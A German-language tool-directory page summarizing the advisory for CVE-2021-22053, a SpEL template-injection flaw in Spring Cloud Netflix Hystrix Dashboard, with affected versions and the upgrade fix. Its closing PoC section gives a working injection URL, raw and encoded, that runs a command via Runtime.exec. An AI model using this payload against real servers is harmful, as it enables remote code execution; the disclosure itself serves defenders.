Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
spring-cloud-netflix-hystrix-dashboard-cve-2021-22053 — Schwachstelle bei der Template-Auflösung des Spring Cloud Netflix Hystrix Dashboards CVE-2021-22053 | Kitploit
Tools/GitHubGitHub/seccoder-security-lab/spring-cloud-netflix-hystrix-dashboard-cve-2021-22053
SchwachstellenanalyseCode-AnalyseExploitationWebanwendungs-ExploitationLernen & Bildung
GitHubseccoder-security-lab/spring-cloud-netflix-hystrix-dashboard-cve-2021-22053

spring-cloud-netflix-hystrix-dashboard-cve-2021-22053

Schwachstelle bei der Template-Auflösung des Spring Cloud Netflix Hystrix Dashboards CVE-2021-22053

Repository anzeigen

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
378vor 3 JahrenVon Kitploit geprüft

CVE-2021-22053: Schwachstelle bei der Template-Auflösung in Spring Cloud Netflix Hystrix Dashboard

Schweregrad

Hoch

Anbieter

Spring by VMware

Beschreibung

Anwendungen, die sowohl spring-cloud-netflix-hystrix-dashboard als auch spring-boot-starter-thymeleaf verwenden, bieten eine Möglichkeit, Code auszuführen, der während der Auflösung von View-Templates im URI-Pfad der Anfrage übermittelt wird. Wenn eine Anfrage an /hystrix/monitor;[user-provided data] gestellt wird, werden die Pfadelemente nach hystrix/monitor als SpringEL-Ausdrücke ausgewertet, was zu Codeausführung führen kann.

Betroffene VMware-Produkte und -Versionen

Der Schweregrad ist hoch, sofern nicht anders angegeben.

  • Spring Cloud Netflix
    • 2.2.0.RELEASE bis 2.2.9.RELEASE
    • Ältere, nicht unterstützte Versionen sind ebenfalls betroffen

Gegenmaßnahmen

Benutzer betroffener Versionen sollten die folgende Gegenmaßnahme anwenden: Benutzer sollten auf 2.2.10.RELEASE+ aktualisieren. Weitere Schritte sind nicht erforderlich. Zu den Versionen, die dieses Problem behoben haben, gehören:

  • Spring Cloud Netflix
    • 2.2.10.RELEASE+

Anerkennung

Diese Schwachstelle wurde von threedr3am vom SecCoder Security Lab identifiziert und verantwortungsbewusst gemeldet ([email protected]).

Referenzen

https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:L

Verlauf

2021-11-17: Erster Schwachstellenbericht veröffentlicht.

POC

roh:

root@kitploit:~
http://127.0.0.1:8080/hystrix/;a=a/__${T (java.lang.Runtime).getRuntime().exec("open -a calculator")}__::.x/

kodiert:

root@kitploit:~
http://127.0.0.1:8080/hystrix/;a=a/__$%7BT%20(java.lang.Runtime).getRuntime().exec(%22open%20-a%20calculator%22)%7D__::.x/

PS. Der Schrägstrich '/' kann im Befehl nicht mitgeführt werden

Tool herunterladen